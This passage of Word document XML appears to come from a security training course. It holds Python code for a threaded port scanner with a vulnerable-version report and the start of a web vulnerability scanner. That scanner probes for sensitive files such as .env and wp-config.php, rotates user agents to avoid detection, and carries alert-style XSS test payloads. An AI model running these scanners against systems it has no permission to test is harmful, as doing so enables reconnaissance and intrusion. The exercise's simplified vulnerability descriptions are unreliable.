      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FE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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09579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3348E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identify_service_version(banner, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE3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"""Identify service and version from banner"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0C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not banner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B928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{"service": "unknown", "version": "unknown"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C1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8B58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banner_str = str(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705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D50A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Common patterns for services and versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC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patterns = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DAF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'ssh': (r'SSH|OpenSSH', r'([0-9]+\.[0-9]+\.?[0-9]*)'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B734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'http': (r'Server: (.*?)\r\n', r'([0-9]+\.[0-9]+\.?[0-9]*)'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3037D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'ftp': (r'FTP|FileZilla|vsftpd|ProFTPD', r'([0-9]+\.[0-9]+\.?[0-9]*)'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C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'smtp': (r'SMTP|Postfix|Exim|Exchange', r'([0-9]+\.[0-9]+\.?[0-9]*)'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694B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'mysql': (r'MySQL', r'([0-9]+\.[0-9]+\.?[0-9]*)'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554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FDCB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Default values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31999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service = "unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE9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version = "unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED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372F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Check for known patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD59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svc, (svc_pattern, ver_pattern) in patterns.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BECF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re.search(svc_pattern, banner_str, re.IGNORECASE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960F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service = svc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5D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version_match = re.search(ver_pattern, banner_str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E538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version_match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F55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version = version_match.group(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D98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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AC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C6C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If service still unknown, check common port assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61566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service == "unknown":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869F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port_services = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C7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22: 'SSH', 80: 'HTTP', 443: 'HTTPS', 21: 'FTP',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848C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25: 'SMTP', 110: 'POP3', 143: 'IMAP', 3306: 'MySQL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D8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5432: 'PostgreSQL', 3389: 'RDP', 5900: 'VNC'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46813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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E196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port in port_services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65367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service = port_services[port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA4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F7D9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{"service": service, "version": version}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3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80AC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scan_target(target_ip, port_range=None, timeout=1, threads=100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7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"""Perform comprehensive port scan with service detection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63288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port_range is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CD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port_range = range(1, 1025)  # Default: well-known ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328EC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DB22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open_ports = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59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print_lock = threading.Lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8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port_queue = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268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9AC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Add ports to the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F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port in port_range:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C1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port_queue.put(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CF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C246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worker():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AF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while not port_queue.empty():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787D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 = port_queue.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7556B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 = scan_port(target_ip, port, timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5F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175BB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result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F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Port is open, grab banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F6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banner = grab_banner(target_ip, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A1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service_info = identify_service_version(banner, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B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6D03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with print_lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554A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print(f"[+] Port {port}/tcp open - {service_info['service']} {service_info['version']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2D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55EDD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open_ports.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C85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"port": port,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFB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"service": service_info['service'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3FA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"version": service_info['version'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF86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"banner": str(banner) if banner else None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46140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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DA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5792E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port_queue.task_done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466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2AA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Create worker threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DE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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D02C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print(f"[*] Starting scan on {target_ip}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33669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4BF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for _ in range(min(threads, port_queue.qsize())):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DC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 = threading.Thread(target=worker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9E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t.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBC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t.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BFD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6788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Wait for scan to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA1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port_queue.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64357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scan_time = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701B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3B52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# Print summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577BF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print(f"\n[*] Scan completed in {scan_time:.2f} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731F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print(f"[*] {len(open_ports)} ports open out of {len(port_range)} ports scanned")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45362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1049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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB4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"target": target_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F8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"open_ports": open_ports,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C16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"scan_time": scan_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D158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"ports_scanned": len(port_range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9EC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1A39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def generate_report(scan_results):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75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"""Generate a security report based on scan results"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C9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 = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F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report.append("=== PORT SCAN SECURITY REPORT ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4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report.append(f"Target: {scan_results['target']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B9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report.append(f"Scan Time: {scan_results['scan_time']:.2f} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A99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report.append(f"Open Ports: {len(scan_results['open_ports'])} out of {scan_results['ports_scanned']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFA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DA7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if scan_results['open_ports']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D21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report.append("\nDETAILED FINDINGS:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1E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0693E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Known vulnerable software versions (simplified for the exercise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE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vulnerable_versions = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444EE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"apache": {"2.2.": "Multiple vulnerabilities in Apache 2.2.x including memory leaks and DoS"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA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"openssh": {"7.2": "Authentication bypass vulnerability in OpenSSH 7.2"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910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"vsftpd": {"2.3.4": "Backdoor vulnerability in vsftpd 2.3.4"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC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"mysql": {"5.5.": "Multiple SQL injection vulnerabilities in MySQL 5.5.x"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A45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F60D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port_info in scan_results['open_ports']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33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 = port_info['port']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44A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service = port_info['service']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C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version = port_info['version']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E196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0FA8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report.append(f"\n[Port {port}] - {service.upper()} {version}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A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6B63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Check for security recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E408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port in [22, 21, 23, 3389]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEC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  [!] Remote access service - Ensure proper authentication and access controls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22618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7EAB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port == 3306 and not port_info.get('local_only', True):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C23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  [!] Database port exposed to network - Consider restricting access")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2C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D407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Check for known vulnerable versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39995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service in vulnerable_versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16856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for ver_pattern, vuln_desc in vulnerable_versions[service].items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E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if ver_pattern in version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129B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report.append(f"  [VULNERABILITY] {vuln_desc}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB4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AD8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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D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report.append("\nNo open ports detected. Target appears to be well-protected or offline.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C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B87F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return '\n'.join(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A9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1DC2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usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3B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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06211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 = argparse.ArgumentParser(description='Advanced Port Scanner with Service Detection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2772B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parser.add_argument('target', help='Target IP address to scan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B7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parser.add_argument('-p', '--ports', help='Port range to scan (e.g., 1-100)', default='1-1024')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFC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parser.add_argument('-t', '--threads', type=int, help='Number of threads', default=100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B04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parser.add_argument('-o', '--output', help='Output file for report')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A2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args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67948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9C6F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12C00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Parse port range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD23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'-' in args.ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B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start, end = map(int, args.ports.split('-'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BEA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port_range = range(start, end + 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D53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0D175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port_range = [int(p) for p in args.ports.split(',')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DE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68B3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Run the scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CA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scan_results = scan_target(args.target, port_range, threads=args.threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BD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8B50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Generate and display report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F92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 = generate_report(scan_results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB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print("\n" + report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37484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5245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Save report if requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879D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args.output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9C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with open(args.output, 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AC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f.write(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684D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print(f"\nReport saved to {args.output}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCE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04677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ValueError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04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print(f"Error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C2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KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C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print("\nScan interrupted by user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0B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sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188704BF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Exercise 2: Web Application Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803E02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Objective:</w:t>
      </w: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Create a basic web application vulnerability scanner that detects common security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB749B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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2E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Implement directory and file enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2B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Detect common vulnerabilities like XSS and SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066C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Check for information disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE2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Generate a security report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD119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zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sample Code Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93F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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A806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bs4 import BeautifulSoup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6E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re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27014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urllib.parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C8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argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348FF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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211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import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A4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from concurrent.futures import ThreadPoolExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9F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4F35C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class WebVulnScanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7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__init__(self, target_url, threads=5, timeout=10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B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self.target_url = target_url if target_url.startswith('http') else f"http://{target_url}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264F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self.base_domain = urllib.parse.urlparse(self.target_url).netloc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F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self.timeout = timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA9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self.threads = threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73973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self.visited_urls = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74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self.results = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF38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"info_disclosure": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC50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"xss_vulnerable": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25A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"sqli_vulnerable": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD40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"open_directories": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78B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"interesting_files": []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BB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self.common_dirs = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63B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"/admin", "/login", "/wp-admin", "/backup", "/config", "/db",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0445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"/debug", "/old", "/dev", "/test", "/tmp", "/upload", "/uploads",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCE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"/files", "/private", "/backup-files", "/admin_area", "/site",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA64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"/secret", "/root", "/wp-content", "/wp-includes", "/images"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F7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1C4E0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self.interesting_files = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F1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"robots.txt", "sitemap.xml", ".git/HEAD", ".env", "config.php",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB84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"wp-config.php", ".htaccess", "server-status", "phpinfo.php",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88E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"config.ini", "web.config", ".DS_Store", "backup.sql", "error_log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A0E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6CE15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self.user_agents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABB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"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69279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"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D160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"Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55649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20BB9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5FAB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get_random_user_agent(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DADD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"""Return a random user agent to avoid detection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC4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random.choice(self.user_agents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C67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7F9A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make_request(self, url, method="GET", data=None, params=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE4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"""Make an HTTP request with error handling and random user-agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C7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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543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headers = {"User-Agent": self.get_random_user_agent()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910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188B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method.upper() == "GET":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B9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response = requests.get(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294D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url, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F2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headers=headers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52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params=params,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CB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timeout=self.timeout,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C3B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allow_redirects=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCEF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elif method.upper() == "POST":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F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response = requests.post(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601B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url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329EA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headers=headers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E604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data=data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257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timeout=self.timeout,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249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allow_redirects=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED79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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E180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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD22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2A41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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077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1B55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except requests.exceptions.RequestException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2F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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA96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0244F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check_directory_listing(self, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E43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"""Check if directory listing is enabled"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121C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response = self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E4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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A175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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D709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1B59E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Common directory listing signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02098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patterns = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB6A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r'&lt;title&gt;Index of /',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FC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r'&lt;h1&gt;Index of /',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60E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r'Directory Listing For',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B889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r'Parent Directory&lt;/a&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BB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3C97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57FD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pattern in patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A69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re.search(pattern, response.text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459D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print(f"[+] Open directory found: {url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AC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self.results["open_directories"].append(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CB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47C0A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608F4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0DDD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discover_directories(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAEB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"""Check for common directories"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2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print("\n[*] Checking for common directories...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54195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CFED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def check_dir(directory):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3647B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url = urllib.parse.urljoin(self.target_url, directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A98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self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBE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1EF4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response and response.status_code &lt; 400:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E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print(f"[+] Directory found: {url} (Status: {response.status_code})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983E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Check if it has directory listing enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF644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self.check_directory_listing(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE8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url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B7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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7A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DECF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Use ThreadPoolExecutor for concurrent scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB5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ThreadPoolExecutor(max_workers=self.threads) as executor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E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results = list(executor.map(check_dir, self.common_dirs))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1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3C9D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Filter out None results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9ED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[r for r in results if r]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D26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47E8E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discover_files(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D95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"""Check for interesting files"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121EC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print("\n[*] Checking for interesting files...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0D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FDA9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def check_file(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41114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url = urllib.parse.urljoin(self.target_url, filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1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self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADD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0F59F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response and response.status_code &lt; 400:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E78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print(f"[+] File found: {url} (Status: {response.status_code})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111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self.results["interesting_files"].append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93E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"url": url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD9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"size": len(response.content),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14E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"content_type": response.headers.get('Content-Type', 'unknown')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A82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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED0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url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEEE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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C16C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45C5C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Use ThreadPoolExecutor for concurrent scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4505A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with ThreadPoolExecutor(max_workers=self.threads) as executor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F6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results = list(executor.map(check_file, self.interesting_files))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F58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463D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Filter out None results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69D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[r for r in results if r]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92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ACFE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extract_forms(self, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2D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"""Extract all forms from a page"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69C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response = self.make_request(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85F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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56543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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971E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791E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soup = BeautifulSoup(response.text, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01606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soup.find_all('form')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5B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6A9D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test_xss_vulnerability(self, url, form_details):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D586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"""Test if a form is vulnerable to XSS attacks"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9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xss_payloads = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A29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"&lt;script&gt;alert('XSS')&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC8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"&lt;img src=x onerror=alert('XSS')&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F159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"&lt;svg onload=alert('XSS')&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F9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"\"&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41221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009E9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FD3D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Select a payload at random to avoid detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35335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xss_payload = random.choice(xss_payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75730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ADB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the form action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB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action = form_details.get("action", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8A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action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B28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action = url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129F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not action.startswith("http"):</w:t>
